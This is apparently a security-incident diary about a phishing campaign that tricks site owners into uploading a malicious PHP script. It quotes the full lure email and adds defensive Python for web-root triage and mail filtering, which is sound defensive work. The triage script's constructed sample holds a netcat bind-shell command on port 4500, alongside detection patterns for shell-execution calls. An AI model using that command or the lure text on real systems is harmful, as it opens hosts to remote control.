Last Updated: 2007-02-19 22:15:50 UTC
by Patrick Nolan (Version: 5)
We received a report from Hugh Brower of a spammed email, sent to domain WHOIS contacts, that carries a malicious PHP attachment. The email is spoofed to look like it comes from the domain's hosting provider and tries to trick the recipient into uploading the attachment to their own web server, where it then runs as a PHP script (see the instructions quoted below). Current attachment details:
File name: webguard.php
File size: 130990 bytes
Additional information developed since shows that WHOIS contact data is NOT the only source of recipient email addresses. In one instance the recipient's email address was published only on the website itself.
Johannes has a preliminary analysis of the first script reported above. It shows that the script harvests critical system configuration information and emails it out, sets up a shell, and drops a Perl IRC bot. Look for a netcat listener on port 4500.
We've received additional reports (thanks to Andy Sutton!). In one variant the spoofed sender is the US FDIC (Federal Deposit Insurance Corporation); that variant's script attachment details:
File name: vprotect.php
File size: 156686 bytes
**NOTE** The emails we have received contain virtually identical instructions; only the attachment name and the spoofed sender differ.
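For a hosting customer (or their admin) who suspects one of these attachments was uploaded, here is a small host-side triage script. It is an added example, not the handlers' code and not derived from the sample itself. The only indicators it takes from this diary are the two attachment names with their sizes and the netcat listener on TCP 4500; the content heuristics (a PHP file that embeds a Perl shebang, starts `nc -l`, calls shell-execution functions, or opens sockets) are generic dropper signals added here as assumptions. The web root contents and the netstat output it runs against are constructed for the demo.

```python
"""Host-side triage for the webguard.php / vprotect.php campaign.

Added example, not the handlers' code. Name/size indicators and the port
4500 listener come from the diary; the content patterns are assumptions.
"""
import os
import re
import tempfile

# Indicators from the diary: attachment name -> size in bytes.
KNOWN_ATTACHMENTS = {"webguard.php": 130990, "vprotect.php": 156686}
LISTENER_PORT = 4500

# Generic heuristics (assumptions, not taken from the real sample).
CONTENT_PATTERNS = {
    "embedded-perl": re.compile(rb"#!\s*/usr/bin/(?:env\s+)?perl"),
    "netcat-listener": re.compile(rb"\bnc\b[^\n]*\s-l"),
    "shell-exec": re.compile(
        rb"\b(?:system|exec|shell_exec|passthru|popen|proc_open)\s*\("),
    "socket": re.compile(rb"fsockopen\s*\(|IO::Socket::INET"),
}


def scan_webroot(root):
    """Return [(path, [reasons])] for suspicious PHP files under root."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith((".php", ".phtml", ".php5")):
                continue
            path = os.path.join(dirpath, name)
            reasons = []
            if name in KNOWN_ATTACHMENTS:
                reasons.append("known-name")
                # A size match on its own is weak; it only strengthens a name hit.
                if os.path.getsize(path) == KNOWN_ATTACHMENTS[name]:
                    reasons.append("known-size")
            with open(path, "rb") as fh:
                data = fh.read()
            reasons.extend(label for label, pat in CONTENT_PATTERNS.items()
                           if pat.search(data))
            if reasons:
                hits.append((path, reasons))
    return hits


def find_listener(netstat_output, port=LISTENER_PORT):
    """True if a LISTEN line of `netstat -an` style output binds the port.

    Only the local-address column can match: the foreign address of a
    listening socket is '*' or '0.0.0.0:*', which never ends in the port.
    """
    local = re.compile(rf"[:.]{port}$")
    for line in netstat_output.splitlines():
        if "LISTEN" in line and any(local.search(tok) for tok in line.split()):
            return True
    return False


# --- Constructed sample data for a stand-alone run (not real artefacts) ---
SAMPLE_DROPPER = b"""<?php
// constructed stand-in for the dropper, padded below to the reported size
$bot = "#!/usr/bin/perl\\nuse IO::Socket::INET;\\n";
file_put_contents("/tmp/.bot.pl", $bot);
system("nc -l -p 4500 -e /bin/sh &");
?>
"""
SAMPLE_NETSTAT = """Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:4500            0.0.0.0:*               LISTEN
tcp        0      0 10.0.0.5:4500           198.51.100.7:51324      ESTABLISHED
"""


def build_sample_webroot(base):
    """Write a benign index.php and a padded fake webguard.php under base."""
    docroot = os.path.join(base, "public_html")
    os.makedirs(docroot, exist_ok=True)
    with open(os.path.join(docroot, "index.php"), "wb") as fh:
        fh.write(b"<?php echo 'hello'; ?>\n")
    pad = KNOWN_ATTACHMENTS["webguard.php"] - len(SAMPLE_DROPPER)
    with open(os.path.join(docroot, "webguard.php"), "wb") as fh:
        fh.write(SAMPLE_DROPPER + b"\n" * pad)


def run_demo():
    """Build the sample web root, scan it, and check the sample netstat."""
    base = tempfile.mkdtemp(prefix="webguard-triage-")
    build_sample_webroot(base)
    return scan_webroot(base), find_listener(SAMPLE_NETSTAT)


if __name__ == "__main__":
    hits, listening = run_demo()
    for path, reasons in hits:
        print(f"{path}: {', '.join(reasons)}")
    print(f"netcat listener on {LISTENER_PORT}: {listening}")
```

On a real host, point `scan_webroot` at the account's public_html/htdocs/wwwroot and feed `find_listener` the output of `netstat -an` (or `ss -ltn`); a name or size hit is only a starting point, since the attacker can rename the file, so the content heuristics and the listener check matter more.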
Matt Jonkman dropped us a note pointing out an identical attachment attack; see BleedingSnort. He reports: "Initial hits we saw were on the 9th and earlier. The FBI is aware, the original sites in use were shut down."
The email reads:
"Subject: Hosting Regular Security Maintenance
Dear yourdomainhost valued Members
Regarding our new security regulations, as a part of our yearly maintenance we have provided a security guard script in the attachment.
So, to secure your websites, please use the attached file and (for UNIX/Linux Based servers) upload the file "webguard.php" in:
"./public_html" or (for Windows Based servers) in: "./wwwroot" in your site.
If you do not know how to use it, you can use the following instruction:
For Unix/Linux or Windows based websites that use PHP/CGI/PERL/ASP:
1) Download the attachment named "webguard.php"
2) Login to your site Control panel.
3) Open "File Manager" window.
4) Go through "Public_html" or "htdocs" (for UNIX/Linux Based servers),
but for Windows Based server, please Go through "wwwroot" directory.
5) Choose "Upload Files"
6) Upload the file "webguard.php"
7) Check its URL too "http://www.yoursite.com/webguard.php", if it is ok
Thank you for using our services and products. We look forward to providing you with a unique and high quality service.
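Because the lure depends on a server-side script arriving as a mail attachment, a mail gateway can stop it without knowing the sample. The following is an added example of such a check (not the handlers' code): it flags messages with attachments whose filename ends in a server-side script extension and, as a weaker secondary signal, the subject line and wording quoted above. The subject, attachment names and lure sentences are taken from this diary; the MIME messages, sender addresses (placeholders under the reserved `.example` domain) and the benign control message are constructed for the demo.

```python
"""Mail-gateway check for the 'security guard script' lure.

Added example, not the handlers' code. Subject, attachment names and lure
wording come from the diary; the messages themselves are constructed.
"""
import email
from email import policy
from email.message import EmailMessage

# Server-side script types a hosting customer would be asked to upload.
SCRIPT_EXTENSIONS = (".php", ".phtml", ".php5", ".pl", ".cgi", ".asp")
LURE_SUBJECT = "Hosting Regular Security Maintenance"
LURE_PHRASES = ("security guard script", "yearly maintenance", "upload the file")


def check_message(raw_bytes):
    """Return a list of findings for one RFC 5322 message (empty if clean)."""
    msg = email.message_from_bytes(raw_bytes, policy=policy.default)
    findings = []
    for part in msg.iter_attachments():
        name = (part.get_filename() or "").lower()
        if name.endswith(SCRIPT_EXTENSIONS):
            findings.append(f"script attachment: {name}")
    if msg.get("Subject", "").strip().lower() == LURE_SUBJECT.lower():
        findings.append("known lure subject")
    body = msg.get_body(preferencelist=("plain", "html"))
    text = body.get_content().lower() if body is not None else ""
    matched = [p for p in LURE_PHRASES if p in text]
    if len(matched) >= 2:  # one phrase alone is too common to act on
        findings.append("lure wording: " + ", ".join(matched))
    return findings


# --- Constructed samples ---------------------------------------------------
LURE_BODY = (
    "Dear yourdomainhost valued Members\n"
    "Regarding our new security regulations, as a part of our yearly "
    "maintenance we have provided a security guard script in the attachment.\n"
    "So, to secure your websites, please use the attached file and upload "
    "the file in ./public_html in your site.\n"
)


def build_lure(sender, attachment_name):
    """Constructed lure: spoofed sender, diary subject/wording, script attached."""
    msg = EmailMessage()
    msg["From"] = sender  # spoofed; address is a placeholder
    msg["To"] = "hostmaster@example.org"
    msg["Subject"] = LURE_SUBJECT
    msg.set_content(LURE_BODY)
    msg.add_attachment(b"<?php /* constructed placeholder, not the sample */ ?>",
                       maintype="application", subtype="octet-stream",
                       filename=attachment_name)
    return msg.as_bytes()


def build_benign():
    """Constructed control message with a non-script attachment."""
    msg = EmailMessage()
    msg["From"] = "billing@example.net"
    msg["To"] = "hostmaster@example.org"
    msg["Subject"] = "Invoice 2007-02"
    msg.set_content("Please find the invoice attached.\n")
    msg.add_attachment(b"%PDF-1.4 constructed", maintype="application",
                       subtype="pdf", filename="invoice.pdf")
    return msg.as_bytes()


if __name__ == "__main__":
    for raw in (build_lure("support@yourdomainhost.example", "webguard.php"),
                build_lure("alerts@fdic.example", "vprotect.php"),
                build_benign()):
        print(check_message(raw) or ["clean"])
```

The attachment-extension rule is the one worth enforcing as a block; the subject and phrase matches are useful for tagging and metrics but will be left behind as soon as the lure text changes, which the diary already shows happening between the hosting-provider and FDIC variants.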
The attack has targeted more than one domain but does not appear to be widespread at the moment. Additional details will be posted as they develop.
And thanks Handlers!